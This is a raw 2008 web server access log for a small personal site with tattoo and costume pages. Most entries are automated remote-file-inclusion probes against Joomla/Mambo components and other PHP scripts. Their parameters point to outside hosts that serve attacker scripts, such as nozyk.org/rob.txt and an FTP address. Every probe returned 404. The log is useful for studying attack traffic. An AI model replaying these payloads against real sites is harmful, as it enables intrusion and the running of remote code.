74.6.17.158 - - [21/Jun/2008:19:01:43 -0500] "GET /logs/access_log.1163548800 HTTP/1.0" 200 238130 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.213.245.215 - - [21/Jun/2008:19:02:44 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nozyk.org/rob.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
207.213.245.215 - - [21/Jun/2008:19:02:44 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nozyk.org/rob.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.65"
74.6.76.45 - - [21/Jun/2008:19:06:02 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.82.113.90 - - [21/Jun/2008:19:06:05 -0500] "GET /logs///toolbar.php?dirDepth=http://h.b-warez.com/kk/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
208.82.113.90 - - [21/Jun/2008:19:06:05 -0500] "GET ///toolbar.php?dirDepth=http://h.b-warez.com/kk/id.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.812"
193.201.171.220 - - [21/Jun/2008:19:06:28 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/include/idpoi.txt%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.201.171.220 - - [21/Jun/2008:19:06:28 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/include/idpoi.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
79.171.18.36 - - [21/Jun/2008:19:06:49 -0500] "GET /logs//include/write.php?dir=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
79.171.18.36 - - [21/Jun/2008:19:06:50 -0500] "GET //include/write.php?dir=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
217.212.224.181 - - [21/Jun/2008:19:09:08 -0500] "GET /rachel%20study/ HTTP/1.0" 200 - "-""psbot/0.1 (+http://www.picsearch.com/bot.html)"
87.106.18.76 - - [21/Jun/2008:19:13:22 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.18.76 - - [21/Jun/2008:19:13:27 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.18.76 - - [21/Jun/2008:19:13:33 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.106.18.76 - - [21/Jun/2008:19:13:33 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.106.101.24 - - [21/Jun/2008:19:14:20 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.106.101.24 - - [21/Jun/2008:19:14:21 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
207.213.245.215 - - [21/Jun/2008:19:15:18 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
207.213.245.215 - - [21/Jun/2008:19:15:19 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
89.188.110.30 - - [21/Jun/2008:19:16:47 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/include/idpoi.txt%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.188.110.30 - - [21/Jun/2008:19:16:47 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/include/idpoi.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.212.18.238 - - [21/Jun/2008:19:18:19 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://mastiarea.info/downloads/help01.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
66.212.18.238 - - [21/Jun/2008:19:18:19 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://mastiarea.info/downloads/help01.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
210.86.238.86 - - [21/Jun/2008:19:19:44 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ignorminious.co.uk/backuptest.php???? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
210.86.238.86 - - [21/Jun/2008:19:19:44 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ignorminious.co.uk/backuptest.php???? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
210.86.238.86 - - [21/Jun/2008:19:19:48 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ignorminious.co.uk/backuptest.php???? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
210.86.238.86 - - [21/Jun/2008:19:19:48 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ignorminious.co.uk/backuptest.php???? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
74.53.178.146 - - [21/Jun/2008:19:19:49 -0500] "GET /logs/ktedit/toolbar.php?dirDepth=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
74.53.178.146 - - [21/Jun/2008:19:19:49 -0500] "GET /ktedit/toolbar.php?dirDepth=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
74.6.17.158 - - [21/Jun/2008:19:22:26 -0500] "GET /logs/access_log.1155772800 HTTP/1.0" 200 232285 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.157.210 - - [21/Jun/2008:19:23:37 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ignorminious.co.uk/backuptest.php???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
77.221.157.210 - - [21/Jun/2008:19:23:38 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ignorminious.co.uk/backuptest.php???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.157.210 - - [21/Jun/2008:19:24:43 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ignorminious.co.uk/backuptest.php???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
77.221.157.210 - - [21/Jun/2008:19:24:43 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ignorminious.co.uk/backuptest.php???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.212.18.238 - - [21/Jun/2008:19:34:52 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?ExEDepth=http://mastiarea.info/downloads/help01.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
66.212.18.238 - - [21/Jun/2008:19:34:52 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?ExEDepth=http://mastiarea.info/downloads/help01.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
207.213.245.215 - - [21/Jun/2008:19:37:12 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
207.213.245.215 - - [21/Jun/2008:19:37:13 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
80.67.25.167 - - [21/Jun/2008:19:37:24 -0500] "GET /logs//include/write.php?dir=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
80.67.25.167 - - [21/Jun/2008:19:37:24 -0500] "GET //include/write.php?dir=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
205.188.117.142 - - [21/Jun/2008:19:37:58 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://aolsearch.aol.com/aol/search?invocationType=searchbox.webhome&query=king+henry+viii+and+ann+bolen""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)"
217.110.54.240 - - [21/Jun/2008:19:39:26 -0500] "GET /logs//errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
217.110.54.240 - - [21/Jun/2008:19:39:27 -0500] "GET //errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
69.115.103.48 - - [21/Jun/2008:19:39:35 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/search?hl=en&safe=off&q=bert+grimm+flash&btnG=Search""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:35 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:35 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:35 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:35 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:36 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:38 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:48 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:48 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:48 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:48 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:48 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:48 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:48 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:48 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.115.103.48 - - [21/Jun/2008:19:39:49 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
70.86.29.178 - - [21/Jun/2008:19:40:04 -0500] "GET /logs/access_log.1207785600//modules/TotalCalendar/about.php?inc_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 343 "-""libwww-perl/5.812"
70.86.29.178 - - [21/Jun/2008:19:40:04 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 316 "-""libwww-perl/5.812"
70.86.29.178 - - [21/Jun/2008:19:40:04 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
74.6.8.120 - - [21/Jun/2008:19:42:57 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.217 - - [21/Jun/2008:19:42:57 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.220.139.98 - - [21/Jun/2008:19:51:54 -0500] "GET /logs/index.php?root=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
212.220.139.98 - - [21/Jun/2008:19:51:54 -0500] "GET /logs/index.php?root=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
212.220.139.98 - - [21/Jun/2008:19:51:54 -0500] "GET /index.php?root=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
212.220.139.98 - - [21/Jun/2008:19:51:54 -0500] "GET /index.php?root=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
62.65.34.76 - - [21/Jun/2008:19:52:34 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?ExEDepth=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
62.65.34.76 - - [21/Jun/2008:19:52:34 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?ExEDepth=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.210.113.58 - - [21/Jun/2008:19:53:44 -0500] "GET /logs/admin.php?vwar_root=http://devel.tritone.net/mambo/administrator/components/com_phpshop/templates/agi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
62.210.113.58 - - [21/Jun/2008:19:53:44 -0500] "GET /admin.php?vwar_root=http://devel.tritone.net/mambo/administrator/components/com_phpshop/templates/agi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
77.221.157.210 - - [21/Jun/2008:19:53:45 -0500] "GET /logs//toolbar.php?dirDepth=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.221.157.210 - - [21/Jun/2008:19:53:46 -0500] "GET //toolbar.php?dirDepth=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
198.170.79.237 - - [21/Jun/2008:19:55:26 -0500] "GET /logs/htmltonuke.php?filnavn=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.0" 404 291 "-""libwww-perl/5.50"
198.170.79.237 - - [21/Jun/2008:19:55:26 -0500] "GET /htmltonuke.php?filnavn=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.0" 404 286 "-""libwww-perl/5.50"
66.249.67.136 - - [21/Jun/2008:19:55:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.136 - - [21/Jun/2008:19:55:30 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.210.113.58 - - [21/Jun/2008:19:57:05 -0500] "GET /logs/admin.php?vwar_root=http://www.sir-ranulf.com/guestbook/mic.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
62.210.113.58 - - [21/Jun/2008:19:57:05 -0500] "GET /admin.php?vwar_root=http://www.sir-ranulf.com/guestbook/mic.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
202.138.187.186 - - [21/Jun/2008:20:00:30 -0500] "GET /logs/index.php?root=http://www.dennisw.idv.tw:8080/xoops/modules/agendax/mc??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.138.187.186 - - [21/Jun/2008:20:00:30 -0500] "GET /index.php?root=http://www.dennisw.idv.tw:8080/xoops/modules/agendax/mc??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.239.91.165 - - [21/Jun/2008:20:00:45 -0500] "GET /logs/access_log.1207785600/index1.php?x=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
216.239.91.165 - - [21/Jun/2008:20:00:45 -0500] "GET /index1.php?x=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
216.239.91.165 - - [21/Jun/2008:20:00:45 -0500] "GET /logs/index1.php?x=http://yourmynumberone.com/mx5club/images/id1.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
88.158.0.5 - - [21/Jun/2008:20:00:59 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
88.158.0.5 - - [21/Jun/2008:20:01:00 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
88.158.0.5 - - [21/Jun/2008:20:01:04 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
88.158.0.5 - - [21/Jun/2008:20:01:05 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
80.67.24.2 - - [21/Jun/2008:20:05:14 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://dpfbrasilia.100webspace.net/cmdAsc.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.24.2 - - [21/Jun/2008:20:05:15 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://dpfbrasilia.100webspace.net/cmdAsc.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
79.171.18.36 - - [21/Jun/2008:20:10:39 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
79.171.18.36 - - [21/Jun/2008:20:10:40 -0500] "GET //config/dbutil.bck.php?confdir=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
80.67.25.167 - - [21/Jun/2008:20:12:33 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.808"
80.67.25.167 - - [21/Jun/2008:20:12:33 -0500] "GET //config/dbutil.bck.php?confdir=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
87.106.18.76 - - [21/Jun/2008:20:15:46 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.106.18.76 - - [21/Jun/2008:20:15:53 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
72.29.81.233 - - [21/Jun/2008:20:15:58 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
87.106.18.76 - - [21/Jun/2008:20:15:58 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
72.29.81.233 - - [21/Jun/2008:20:15:58 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
72.29.81.233 - - [21/Jun/2008:20:15:58 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
72.29.81.233 - - [21/Jun/2008:20:15:58 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
87.106.18.76 - - [21/Jun/2008:20:16:03 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
80.67.25.167 - - [21/Jun/2008:20:16:54 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
80.67.25.167 - - [21/Jun/2008:20:16:55 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.808"
200.72.251.210 - - [21/Jun/2008:20:17:49 -0500] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://nightbaron.com/poll/templates/admin/a.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.63"
200.72.251.210 - - [21/Jun/2008:20:17:49 -0500] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://nightbaron.com/poll/templates/admin/a.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.63"
74.55.76.110 - - [21/Jun/2008:20:21:07 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.812"
74.55.76.110 - - [21/Jun/2008:20:21:07 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://usuarios.lycos.es/servius/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.812"
71.250.24.111 - - [21/Jun/2008:20:23:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
71.250.24.111 - - [21/Jun/2008:20:23:06 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
71.250.24.111 - - [21/Jun/2008:20:23:07 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
71.250.24.111 - - [21/Jun/2008:20:23:07 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
80.67.25.167 - - [21/Jun/2008:20:27:52 -0500] "GET /logs//atom.php5?page=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.25.167 - - [21/Jun/2008:20:27:52 -0500] "GET //atom.php5?page=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
74.53.178.146 - - [21/Jun/2008:20:35:16 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
74.53.178.146 - - [21/Jun/2008:20:35:16 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
79.129.150.139 - - [21/Jun/2008:20:35:22 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
79.129.150.139 - - [21/Jun/2008:20:35:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
79.129.150.139 - - [21/Jun/2008:20:35:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
79.129.150.139 - - [21/Jun/2008:20:35:24 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
79.129.150.139 - - [21/Jun/2008:20:35:27 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
79.129.150.139 - - [21/Jun/2008:20:35:27 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
79.129.150.139 - - [21/Jun/2008:20:35:28 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
